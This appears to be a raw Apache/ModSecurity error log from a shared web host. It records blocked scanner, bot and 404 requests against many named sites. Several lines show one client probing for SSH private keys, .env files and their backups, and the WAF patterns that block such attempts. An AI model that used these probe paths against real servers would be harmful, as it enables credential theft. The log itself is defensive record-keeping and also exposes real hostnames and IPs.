[Tue May 26 14:51:33.147885 2026] [security2:error] [pid 658374:tid 658591] [client 213.35.106.232:49331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVmHZ1Mb7_aby-E0KcZ0AAAAFc"]
[Tue May 26 14:51:33.635661 2026] [security2:error] [pid 658374:tid 658534] [client 178.20.45.128:51973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.45.20.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmHZ1Mb7_aby-E0KcZ3QAAAB4"], referer: http://www.yourstorybag.com/blog/
[Tue May 26 14:51:34.609533 2026] [security2:error] [pid 658374:tid 658610] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmHp1Mb7_aby-E0KcZ7wAAAGo"]
[Tue May 26 14:51:35.447450 2026] [security2:error] [pid 658374:tid 658525] [client 213.35.106.232:49503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahVmH51Mb7_aby-E0KcaEQAAABU"]
[Tue May 26 14:51:36.193382 2026] [security2:error] [pid 658374:tid 658545] [client 185.96.37.44:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaIwAAACk"]
[Tue May 26 14:51:36.194037 2026] [security2:error] [pid 658374:tid 658588] [client 185.96.37.44:60347] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahVmIJ1Mb7_aby-E0KcaHwAAAFQ"]
[Tue May 26 14:51:36.223228 2026] [security2:error] [pid 658374:tid 658587] [client 213.35.106.232:49914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaJwAAAFM"]
[Tue May 26 14:51:36.898152 2026] [security2:error] [pid 658374:tid 658615] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaMwAAAG8"]
[Tue May 26 14:51:37.181930 2026] [security2:error] [pid 658374:tid 658524] [client 213.35.106.232:50035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahVmIZ1Mb7_aby-E0KcaUwAAABQ"]
[Tue May 26 14:51:38.172093 2026] [security2:error] [pid 658374:tid 658538] [client 213.35.106.232:50203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahVmIp1Mb7_aby-E0KcaiAAAACI"]
[Tue May 26 14:51:39.070780 2026] [security2:error] [pid 658374:tid 658545] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmIp1Mb7_aby-E0KcapQAAACk"]
[Tue May 26 14:51:39.170521 2026] [security2:error] [pid 658374:tid 658537] [client 213.35.106.232:50410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahVmI51Mb7_aby-E0KcauQAAACE"]
[Tue May 26 14:51:40.116788 2026] [security2:error] [pid 658374:tid 658511] [client 213.35.106.232:50583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahVmJJ1Mb7_aby-E0KcazQAAAAc"]
[Tue May 26 14:51:41.237225 2026] [security2:error] [pid 658374:tid 658585] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmJJ1Mb7_aby-E0Kca2QAAAFE"]
[Tue May 26 14:51:42.391356 2026] [security2:error] [pid 658374:tid 658577] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmJp1Mb7_aby-E0Kca_QAAAEk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:51:43.433278 2026] [security2:error] [pid 658374:tid 658543] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbHgAAACc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 14:51:43.618047 2026] [security2:error] [pid 658374:tid 658559] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbGAAAADc"]
[Tue May 26 14:51:44.360809 2026] [security2:error] [pid 658374:tid 658558] [client 185.96.37.44:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbOQAAADY"], referer: http://www.kardashevtechnologies.com/
[Tue May 26 14:51:44.361712 2026] [security2:error] [pid 658374:tid 658584] [client 185.96.37.44:36793] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahVmJ51Mb7_aby-E0KcbNwAAAFA"], referer: http://www.kardashevtechnologies.com/
[Tue May 26 14:51:45.199957 2026] [security2:error] [pid 658374:tid 658553] [client 85.121.127.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "taotechservices.com"] [uri "/index.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcbcwAAADE"]
[Tue May 26 14:51:45.429887 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcbawAAAAk"]
[Tue May 26 14:51:45.951375 2026] [security2:error] [pid 658374:tid 658598] [client 213.35.106.232:50766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcblgAAAF4"]
[Tue May 26 14:51:48.096875 2026] [security2:error] [pid 658374:tid 658508] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmK51Mb7_aby-E0Kcb1gAAAAQ"]
[Tue May 26 14:51:48.334161 2026] [security2:error] [pid 658374:tid 658599] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmLJ1Mb7_aby-E0Kcb8AAAAF8"], referer: https://anujtradingco.com
[Tue May 26 14:51:49.907458 2026] [security2:error] [pid 658374:tid 658537] [client 173.252.82.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVmLZ1Mb7_aby-E0KccGgAAACE"]
[Tue May 26 14:51:50.295661 2026] [security2:error] [pid 658374:tid 658612] [client 193.203.165.234:56828] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "buysellcraft.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVmLp1Mb7_aby-E0KccTgAAAGw"]
[Tue May 26 14:51:50.376100 2026] [security2:error] [pid 658374:tid 658511] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmLZ1Mb7_aby-E0KccPgAAAAc"]
[Tue May 26 14:51:52.749614 2026] [security2:error] [pid 658374:tid 658563] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmMJ1Mb7_aby-E0KccmAAAADs"]
[Tue May 26 14:51:54.980047 2026] [security2:error] [pid 658374:tid 658553] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmMp1Mb7_aby-E0KcdOwAAADE"]
[Tue May 26 14:51:56.603861 2026] [security2:error] [pid 658374:tid 658546] [client 85.121.127.3:58918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.127.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmNJ1Mb7_aby-E0KcdigAAACo"]
[Tue May 26 14:51:57.212072 2026] [security2:error] [pid 658374:tid 658601] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNJ1Mb7_aby-E0KcdkgAAAGE"]
[Tue May 26 14:51:59.082634 2026] [security2:error] [pid 658374:tid 658602] [client 85.121.127.3:58872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.127.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVmNp1Mb7_aby-E0Kcd0AAAAGI"], referer: https://taotechservices.com/wp-admin/
[Tue May 26 14:51:59.162567 2026] [security2:error] [pid 658374:tid 658606] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNp1Mb7_aby-E0KcdzwAAAGY"]
[Tue May 26 14:51:59.371248 2026] [security2:error] [pid 658374:tid 658558] [client 49.34.127.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNp1Mb7_aby-E0Kcd2wAAADY"]
[Tue May 26 14:52:02.158082 2026] [security2:error] [pid 658374:tid 658543] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmOZ1Mb7_aby-E0KceRQAAACc"]
[Tue May 26 14:52:03.199978 2026] [security2:error] [pid 658374:tid 658560] [client 5.255.99.53:40092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_dsa"] [unique_id "ahVmO51Mb7_aby-E0KceewAAADg"]
[Tue May 26 14:52:03.627020 2026] [security2:error] [pid 658374:tid 658583] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmO51Mb7_aby-E0KceeAAAAE8"]
[Tue May 26 14:52:03.810938 2026] [security2:error] [pid 658374:tid 658624] [client 5.255.99.53:40076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_rsa"] [unique_id "ahVmO51Mb7_aby-E0KcepgAAAHg"]
[Tue May 26 14:52:03.811071 2026] [security2:error] [pid 658374:tid 658576] [client 5.255.99.53:39994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVmO51Mb7_aby-E0KcepQAAAEg"]
[Tue May 26 14:52:03.858198 2026] [autoindex:error] [pid 658374:tid 658615] [client 164.68.127.128:58461] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:52:04.213514 2026] [security2:error] [pid 658374:tid 658546] [client 5.255.99.53:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVmPJ1Mb7_aby-E0KcewwAAACo"]
[Tue May 26 14:52:04.680829 2026] [security2:error] [pid 658374:tid 658499] [remote 74.7.241.58:51966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVmPJ1Mb7_aby-E0Kce2wAAV3w"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:52:04.717052 2026] [security2:error] [pid 658374:tid 658541] [client 5.255.99.53:36210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVmPJ1Mb7_aby-E0Kce3AAAACU"]
[Tue May 26 14:52:04.888911 2026] [security2:error] [pid 658374:tid 658618] [client 5.255.99.53:40122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVmPJ1Mb7_aby-E0Kce6QAAAHI"]
[Tue May 26 14:52:05.215803 2026] [security2:error] [pid 658374:tid 658515] [client 5.255.99.53:39930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfAAAAAAs"]
[Tue May 26 14:52:05.269384 2026] [security2:error] [pid 658374:tid 658555] [client 5.255.99.53:40092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfCgAAADM"]
[Tue May 26 14:52:05.279319 2026] [security2:error] [pid 658374:tid 658574] [client 5.255.99.53:40076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDwAAAEY"]
[Tue May 26 14:52:05.279374 2026] [security2:error] [pid 658374:tid 658530] [client 5.255.99.53:39994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDgAAABo"]
[Tue May 26 14:52:05.731067 2026] [security2:error] [pid 658374:tid 658504] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDAAAAAA"]
[Tue May 26 14:52:06.851421 2026] [autoindex:error] [pid 658374:tid 658517] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:07.985410 2026] [security2:error] [pid 658374:tid 658535] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmP51Mb7_aby-E0KcfngAAAB8"]
[Tue May 26 14:52:10.638470 2026] [security2:error] [pid 658374:tid 658552] [client 37.27.51.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVmQZ1Mb7_aby-E0Kcf-gAAADA"]
[Tue May 26 14:52:10.954265 2026] [security2:error] [pid 658374:tid 658527] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmQp1Mb7_aby-E0KcgBwAAABc"]
[Tue May 26 14:52:12.385976 2026] [security2:error] [pid 658374:tid 658531] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmQ51Mb7_aby-E0KcgLwAAABs"]
[Tue May 26 14:52:13.600012 2026] [security2:error] [pid 658374:tid 658544] [client 114.119.133.194:55943] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/battle-of-bosworth-puritan-shiraz"] [unique_id "ahVmRZ1Mb7_aby-E0KcgTAAAACg"], referer: http://haddingtonwines.com/products/babydoll-pinot-noir
[Tue May 26 14:52:14.944276 2026] [security2:error] [pid 658374:tid 658510] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmRp1Mb7_aby-E0KcgawAAAAY"]
[Tue May 26 14:52:17.366373 2026] [security2:error] [pid 658374:tid 658629] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmSJ1Mb7_aby-E0KcgwwAAAH0"]
[Tue May 26 14:52:19.009045 2026] [autoindex:error] [pid 658374:tid 658529] [client 34.73.215.69:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
